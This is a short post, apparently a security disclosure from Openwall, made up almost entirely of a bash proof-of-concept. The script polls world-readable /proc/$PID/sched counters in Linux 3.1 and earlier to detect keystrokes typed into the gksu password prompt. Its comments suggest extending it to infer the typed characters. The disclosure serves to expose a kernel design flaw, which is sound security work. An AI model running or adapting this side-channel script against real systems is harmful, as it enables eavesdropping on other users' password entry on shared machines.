/proc/$PID/sched PoC: spy-gksu

[Vasiliy Kulikov <segooon () gmail com>]

#!/bin/bash
#
# A PoC for spying for keystrokes in gksu in Linux <= 3.1.
#
# /proc/$PID/{sched,schedstat} are world readable, so we can just loop
# on one CPU core while the victim is executed on another, and spy for
# the changes of scheduling counters.  The PoC counts only keystrokes number,
# but it can be easily extended to note the delays between the keystrokes
# and do the statistical analysis to learn the input characters.  See
# e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on
# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang.
#
# It is NOT stable, it only shows a design flaw (the lack of proper
# permission model of procfs debugging counters).  The constants are true
# for the author's system only and don't take into account other sources of
# gksu CPU activity.
#
#   by segoon from openwall
#
# run as: spy-sched gksu

PNAME="$1"

while :; do
    PID=`pgrep "$PNAME"`
    if [ -n "$PID" ]; then
        echo $PID
        cd /proc/$PID/
        break
    fi
    sleep 1
done

S=0.0
while :; do
    V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-`
    [ -z "$V" ] && break
    if [ "$V" != "$S" ]; then
        VAL=`echo "$V - $S" | bc -l`
        VALI=`echo $VAL | cut -d. -f1`
        [ -z "$VALI" ] && VALI=0

        if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then
            # Cursor appeared
            :
        elif [ $VALI -le 415 -a $VALI -ge 385 ]; then
            # Cursor disappeared
            :
        elif [ $VALI -ge 150 ]; then
            echo "$VAL (KEY PRESSED)"
        else
            echo "$VAL"
        fi

        S=$V
    fi
done

-- 
Vasiliy Kulikov
http://www.openwall.com - bringing security into open computing environments